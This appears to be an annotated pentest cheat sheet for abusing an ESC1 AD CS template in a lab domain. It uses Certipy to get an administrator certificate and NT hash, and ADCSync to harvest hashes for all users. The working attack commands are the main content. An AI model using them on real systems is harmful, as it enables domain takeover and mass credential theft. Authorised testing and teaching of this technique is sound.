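# Step 1: enumerate certificate templates and CAs. The flag is -dc-ip (the
# original note had "target-ip", which is not a Certipy option); -vulnerable
# restricts the report to templates Certipy already classifies as exploitable.
# Output files are timestamped: <ts>_Certipy.txt / .json and a .zip for BloodHound.
# NOTE: a password given with -p ends up in shell history and in `ps` output on
# the attack host - use a throwaway credential or scrub history afterwards.
$ certipy find -u username@hacklab.com -p password -dc-ip ip -vulnerable
# Step 2: import the .zip into BloodHound and read <ts>_Certipy.txt. An ESC1
# template lets the enrollee supply the subject name (ENROLLEE_SUPPLIES_SUBJECT),
# carries a client-authentication EKU, needs no manager approval, and grants
# enrollment rights to a low-privileged group.
# Step 3: enroll and set an arbitrary UPN. The domain below is taken from the
# -target FQDN; both UPNs were redacted in the original note, so confirm them
# against the template/domain you enumerated. -target is the CA host, not the DC.
$ certipy req -u username@hacklab.com -p password -ca TargetCA -target WIN-2016-FS.hacklab.com -template ESC1 -upn administrator@hacklab.com -dc-ip ip
# Step 4: authenticate with the PFX. Certipy names the file after the user part
# of the UPN, so it is administrator.pfx (the original note misspelled it). On
# success Certipy prints the NT hash and writes a Kerberos ccache.
# CAVEAT: a DC that enforces strong certificate mapping (KB5014754, Full
# Enforcement mode) rejects certificates that lack the SID security extension,
# so this step can fail on a patched domain even when the template is ESC1.
$ certipy auth -pfx administrator.pfx -dc-ip ip
# Record the NT hash - it is a privileged credential and must be handled per the
# engagement's rules. The request also leaves an issued certificate in the CA
# database (Event ID 4886/4887 on the CA); add it to the revocation/cleanup list.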
Usage with ADCSync
The steps below perform the same ESC1 abuse in an automated way, using ADCSync to request a certificate and recover an NT hash for every user in a BloodHound export rather than for a single target account.
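# Automated ESC1 at scale: ADCSync takes the *_users.json file from a
# SharpHound/bloodhound.py collection, requests an ESC1 certificate for each
# user and authenticates with it, producing one NT hash per account.
# ADCSync does not cope with non-ASCII characters in the JSON, so transliterate
# to ASCII first. iconv does NOT take an output file as a second positional
# argument - with two file arguments it simply concatenates both inputs to
# stdout - so redirect (or use -o) and write to a new file instead of
# overwriting the input. //TRANSLIT is a glibc extension; macOS/BSD iconv may
# not support it. (The original note mixed user1.json / user.json / users.json;
# the names are unified here so the second command reads what the first wrote.)
$ iconv -f utf-8 -t ascii//TRANSLIT users_raw.json > users.json
# Same placeholders as the manual flow: low-privileged user/password, CA name,
# CA host or ip. This is noisy and leaves evidence: one 4886/4887 event pair
# and one issued certificate per user in the CA database, all of which need
# revocation/cleanup. ntlm.txt then holds credentials for the whole user
# population - treat it as highly sensitive and remove it when the engagement ends.
$ python adcsync.py -u user -p password -ca CA -template ESC1 -target ip -f users.json -o ntlm.txt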